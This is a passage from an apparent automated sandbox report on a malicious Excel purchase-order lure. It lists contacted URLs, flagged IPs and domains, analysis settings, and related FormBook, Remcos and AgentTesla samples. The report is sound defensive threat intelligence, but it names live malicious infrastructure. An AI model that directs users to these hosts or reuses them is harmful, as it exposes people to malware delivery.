                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/5835120.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/04f06199934.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/365f06199573.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/dongyuefeng/10/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/template/news/lvse/skin/html/images/qr1.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/70b099929.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/baishimolinai/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/4025030.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/dongyuefeng/9/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/7726870.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/246f699747.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/3087620.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/343b06199595.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/516e06199422.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/850c06199088.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/996a06198942.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.2886080.xyz/dongyuefeng/1/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/6496300.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/5580300.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.instagram.com/hover_domainsfind.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/8904020.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ia803104.us.archive.orgpowershell.exe, 0000000A.00000002.444696114.000000000275A000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://ocsp.entrust.net03powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.2886080.xyz/Friends/284f06199654.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/544c06199394.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/338e699655.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/603a06199335.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.2886080.xyz/dongyuefeng/6/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/402d06199536.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/sitemap.xmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/975b06198963.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/9803940.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/template/news/lvse/skin/html/images/symbol-7.pngfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/247d06199691.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/660b899331.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/779c899212.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/8c06199930.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.hover.com/domains/resultsfind.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/72f06199866.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/484d06199454.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.210.150.33powershell.exe, 0000000A.00000002.444696114.000000000287A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/template/news/lvse/skin/html/js/list.jsfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/307a06199631.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/powershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  45.33.6.223
                  		www.sqlite.orgUnited States
                  		63949LINODE-APLinodeLLCUSfalse
                  192.210.150.33
                  		unknownUnited States
                  		36352AS-COLOCROSSINGUStrue
                  207.241.232.154
                  		ia803104.us.archive.orgUnited States
                  		7941INTERNET-ARCHIVEUStrue
                  188.114.97.3
                  		jiourl.comEuropean Union
                  		13335CLOUDFLARENETUStrue
                  76.223.54.146
                  		www.magicface.shopUnited States
                  		16509AMAZON-02USfalse
                  103.249.106.91
                  		www.2886080.xyzChina
                  		137443ANCHGLOBAL-AS-APAnchnetAsiaLimitedHKtrue
                  85.159.66.93
                  		natroredirect.natrocdn.comTurkey
                  		34619CIZGITRfalse
                  216.40.34.41
                  		www.gymuniversity.netCanada
                  		15348TUCOWSCAfalse

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1493701
                  Start date and time:2024-08-16 09:31:16 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 36s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:16
                  Number of new started drivers analysed:1
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:2
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Mac Purchase Order PO102935.xls
                  Detection:MAL
                  Classification:mal100.troj.spyw.expl.evad.winXLS@15/34@16/8
                  EGA Information:
                  • Successful, ratio: 50%
                  HCA Information:
                  • Successful, ratio: 86%
                  • Number of executed functions: 66
                  • Number of non-executed functions: 185
                  Cookbook Comments:
                  • Found application associated with file extension: .xls
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer

                  Warnings

                  • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, WMIADAP.exe, conhost.exe
                  • Execution Graph export aborted for target EQNEDT32.EXE, PID 300 because there are no executed function
                  • Execution Graph export aborted for target powershell.exe, PID 3148 because it is empty
                  • Execution Graph export aborted for target wfbjvizcWo.exe, PID 1372 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  03:32:39API Interceptor33x Sleep call for process: EQNEDT32.EXE modified
                  03:32:41API Interceptor17x Sleep call for process: wscript.exe modified
                  03:32:42API Interceptor97x Sleep call for process: powershell.exe modified
                  03:33:12API Interceptor1390x Sleep call for process: wfbjvizcWo.exe modified
                  03:33:17API Interceptor542137x Sleep call for process: find.exe modified

                  LLM Input / Output

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  45.33.6.223SecuriteInfo.com.PDF.Phishing.7B6B.tr.10532.1457.xlsxGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
                  AWB# 6290868304.docx.docGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
                  PO AFHOR9301604.exeGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip
                  RFQ-0122-07-2024.xlsGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
                  PO-0122-08-2024.xlsGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2019/sqlite-dll-win32-x86-3290000.zip
                  irlsever.docGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtfGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2020/sqlite-dll-win32-x86-3330000.zip
                  DRAFT CONTRACT COPY_938840.scrGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2020/sqlite-dll-win32-x86-3330000.zip
                  Invoices_05062024.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                  • www.sqlite.org/2016/sqlite-dll-win32-x86-3140000.zip
                  Price and inventory information PO70964311.pdf.exeGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
                  192.210.150.33PO F03954..xlsGet hashmaliciousFormBookBrowse
                  • 192.210.150.33/88/DAN.txt
                  207.241.232.154SecuriteInfo.com.Exploit.CVE-2017-11882.123.13950.5767.rtfGet hashmaliciousRemcosBrowse
                    SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.14420.14138.xlsxGet hashmaliciousRemcosBrowse
                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.11842.29634.rtfGet hashmaliciousRemcosBrowse
                        PI-0008102024002REMAPX.xla.xlsxGet hashmaliciousRemcosBrowse
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.7487.20111.rtfGet hashmaliciousRemcosBrowse
                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.26982.17078.rtfGet hashmaliciousRemcosBrowse
                              SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.19627.13699.xlsxGet hashmaliciousRemcosBrowse
                                SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.30690.22520.xlsxGet hashmaliciousRemcosBrowse
                                  informe - 2024-08-09T174159.596.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                    solicitud de cotizacion0089087785.xlam.xlsxGet hashmaliciousAgentTeslaBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      www.sqlite.orgSecuriteInfo.com.PDF.Phishing.7B6B.tr.10532.1457.xlsxGet hashmaliciousFormBookBrowse
                                      • 45.33.6.223
                                      AWB# 6290868304.docx.docGet hashmaliciousFormBookBrowse
                                      • 45.33.6.223
                                      PO AFHOR9301604.exeGet hashmaliciousFormBookBrowse
                                      • 45.33.6.223
                                      RFQ-0122-07-2024.xlsGet hashmaliciousFormBookBrowse
                                      • 45.33.6.223
                                      PO-0122-08-2024.xlsGet hashmaliciousFormBookBrowse
                                      • 45.33.6.223
                                      irlsever.docGet hashmaliciousFormBookBrowse
                                      • 45.33.6.223
                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtfGet hashmaliciousFormBookBrowse
                                      • 45.33.6.223
                                      DRAFT CONTRACT COPY_938840.scrGet hashmaliciousFormBookBrowse
                                      • 45.33.6.223
                                      Invoices_05062024.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 45.33.6.223
                                      Price and inventory information PO70964311.pdf.exeGet hashmaliciousFormBookBrowse
                                      • 45.33.6.223
                                      natroredirect.natrocdn.comRemittance advice.exeGet hashmaliciousFormBookBrowse
                                      • 85.159.66.93
                                      PURCHASE ORDER 1.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • 85.159.66.93
                                      rPHOTO09AUG2024.exeGet hashmaliciousFormBookBrowse
                                      • 85.159.66.93
                                      SecuriteInfo.com.Win.Packed.Noon-10034509-0.4166.18811.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • 85.159.66.93
                                      00451.exeGet hashmaliciousFormBookBrowse
                                      • 85.159.66.93
                                      BL6387457290.exeGet hashmaliciousFormBookBrowse
                                      • 85.159.66.93
                                      Payment advice.exeGet hashmaliciousFormBookBrowse
                                      • 85.159.66.93
                                      Contract.exeGet hashmaliciousFormBookBrowse
                                      • 85.159.66.93
                                      SecuriteInfo.com.Trojan.MSIL.Injector.13809.31159.exeGet hashmaliciousFormBookBrowse
                                      • 85.159.66.93
                                      PO.exeGet hashmaliciousFormBookBrowse
                                      • 85.159.66.93
                                      ia803104.us.archive.orgSecuriteInfo.com.Exploit.CVE-2017-11882.123.13950.5767.rtfGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.14420.14138.xlsxGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.11842.29634.rtfGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      PI-0008102024002REMAPX.xla.xlsxGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.7487.20111.rtfGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.26982.17078.rtfGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.19627.13699.xlsxGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.30690.22520.xlsxGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      informe - 2024-08-09T174159.596.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 207.241.232.154
                                      solicitud de cotizacion0089087785.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 207.241.232.154
                                      jiourl.comPI-0008102024002REMAPX.xla.xlsxGet hashmaliciousRemcosBrowse
                                      • 188.114.97.3
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.13863.6146.xlsxGet hashmaliciousRemcosBrowse
                                      • 188.114.97.3

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUS34#U0e21.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      file.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 104.26.12.205
                                      Maersk BL, PL & INV.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.96.3
                                      Payment Advice - Advice Ref[BIBBC2023189].exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • 104.21.11.94
                                      GHF09876789002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      http://trabajosny.com/Get hashmaliciousUnknownBrowse
                                      • 104.26.3.190
                                      https://google.com/amp/s/4006cc75.3d7e80c56eb9d325a252ecd6.workers.dev%3Fqrc%3Dtianfeng.han@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                      • 104.18.95.41
                                      DHL 7339BB905AA.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.26.13.205
                                      24450 Y 24451.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                      • 188.114.96.3
                                      http://www.trailhopper.com.au/Get hashmaliciousUnknownBrowse
                                      • 104.17.25.14
                                      AS-COLOCROSSINGUSSecuriteInfo.com.Exploit.CVE-2017-11882.123.13950.5767.rtfGet hashmaliciousRemcosBrowse
                                      • 198.12.81.252
                                      seven.htaGet hashmaliciousCobalt Strike, PureLog Stealer, Snake KeyloggerBrowse
                                      • 192.3.176.138
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.14420.14138.xlsxGet hashmaliciousRemcosBrowse
                                      • 198.12.81.252
                                      SecuriteInfo.com.Win32.Malware-gen.13940.31711.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                      • 192.210.150.19
                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.11842.29634.rtfGet hashmaliciousRemcosBrowse
                                      • 192.3.101.29
                                      ChGLNi1CMY.htaGet hashmaliciousCobalt StrikeBrowse
                                      • 107.172.31.124
                                      PI-0008102024002REMAPX.xla.xlsxGet hashmaliciousRemcosBrowse
                                      • 192.3.101.29
                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.7487.20111.rtfGet hashmaliciousRemcosBrowse
                                      • 192.210.214.9
                                      Quotation.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                      • 23.95.60.82
                                      xd.arm.elfGet hashmaliciousMiraiBrowse
                                      • 107.152.184.93
                                      INTERNET-ARCHIVEUSSecuriteInfo.com.Exploit.CVE-2017-11882.123.13950.5767.rtfGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.14420.14138.xlsxGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.11842.29634.rtfGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      PI-0008102024002REMAPX.xla.xlsxGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.7487.20111.rtfGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.26982.17078.rtfGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.19627.13699.xlsxGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.30690.22520.xlsxGet hashmaliciousRemcosBrowse
                                      • 207.241.232.154
                                      informe - 2024-08-09T174159.596.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 207.241.232.154
                                      15514541_Doc_Sub(C-A0893)10-08-2024.jsGet hashmaliciousUnknownBrowse
                                      • 207.241.227.86
                                      AMAZON-02UShttp://trabajosny.com/Get hashmaliciousUnknownBrowse
                                      • 3.164.206.12
